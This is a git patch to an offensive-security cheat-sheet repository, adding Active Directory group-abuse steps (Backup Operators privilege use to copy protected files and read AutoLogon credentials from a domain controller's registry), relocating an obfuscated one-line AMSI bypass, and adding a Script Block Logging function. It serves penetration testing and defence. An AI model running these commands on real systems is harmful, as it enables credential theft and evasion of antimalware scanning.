From 36e135776fbd4a9824adab5966f3b85a1b322585 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 14 Feb 2023 15:13:41 +0100 Subject: [PATCH] AD Groups + PowerShell Defenses --- .../Active Directory Attack.md | 47 +++++++++++++++- .../Windows - Defenses.md | 55 ++++++++++++++----- 2 files changed, 85 insertions(+), 17 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3f83ebd..14d410a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -92,8 +92,11 @@ - [ADFS - Golden SAML](#adfs---golden-saml) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Active Directory Groups](#active-directory-groups) + - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Abusing Schema Admins Group](#abusing-schema-admins-group) + - [Abusing Backup Operators Group](#abusing-backup-operators-group) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [GenericAll](#genericall) - [GenericWrite](#genericwrite) @@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` +## Active Directory Groups ### Dangerous Built-in Groups Usage @@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount sc \\dc01 start dns ``` +### Abusing Schema Admins Group + +> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. + + +### Abusing Backup Operators Group + +> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. + +This groups grants the following privileges : +- SeBackup privileges +- SeRestore privileges + +* Get members of the group: + ```ps1 + PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse + ``` +* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) + ```ps1 + Import-Module .\SeBackupPrivilegeUtils.dll + Import-Module .\SeBackupPrivilegeCmdLets.dll + + Set-SeBackupPrivilege + Get-SeBackupPrivilege + ``` +* Retrieve sensitive files + ```ps1 + Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite + ``` +* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive + ```ps1 + $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) + $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') + $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} + ``` + ### Abusing Active Directory ACLs/ACEs @@ -4191,4 +4231,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) * [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) -* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) \ No newline at end of file +* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) +* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md index 108b68c..4a58201 100644 --- a/Methodology and Resources/Windows - Defenses.md +++ b/Methodology and Resources/Windows - Defenses.md @@ -2,26 +2,17 @@ ## Summary -* [AMSI](#amsi) * [AppLocker](#applocker) * [DPAPI](#dpapi) * [Powershell](#powershell) - * [JEA](#jea) + * [Anti Malware Scan Interface](#anti-malware-scan-interface) + * [Just Enough Administration](#just-enough-administration) * [Contrained Language Mode](#constrained-language-mode) + * [Script Block Logging](#script-block-logging) * [Windows Defender Antivirus](#windows-defender-antivirus) * [Windows Defender Application Control](#windows-defender-application-control) * [Windows Defender Firewall](#windows-defender-firewall) -## AMSI - -> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. - -Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) - -```powershell -PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) -``` - ## AppLocker @@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep ## Powershell -### JEA +### Anti Malware Scan Interface + +> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. + +Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Just Enough Administration > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. @@ -62,6 +64,7 @@ Breaking out if JEA: Add-Computer ``` + ### Constrained Language Mode Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` @@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM ``` +### Script Block Logging + +> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel. + +Enable Script Block Loggin: + +```ps1 +function Enable-PSScriptBlockLogging +{ + $basePath = 'HKLM:\Software\Policies\Microsoft\Windows' + + '\PowerShell\ScriptBlockLogging' + + if(-not (Test-Path $basePath)) + { + $null = New-Item $basePath -Force + } + + Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1" +} +``` + + + ## Windows Defender Antivirus Also known as `Microsoft Defender`. @@ -186,4 +212,5 @@ Also known as `WDAC/UMCI/Device Guard`. ## References -* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf) \ No newline at end of file +* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf) +* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3) \ No newline at end of file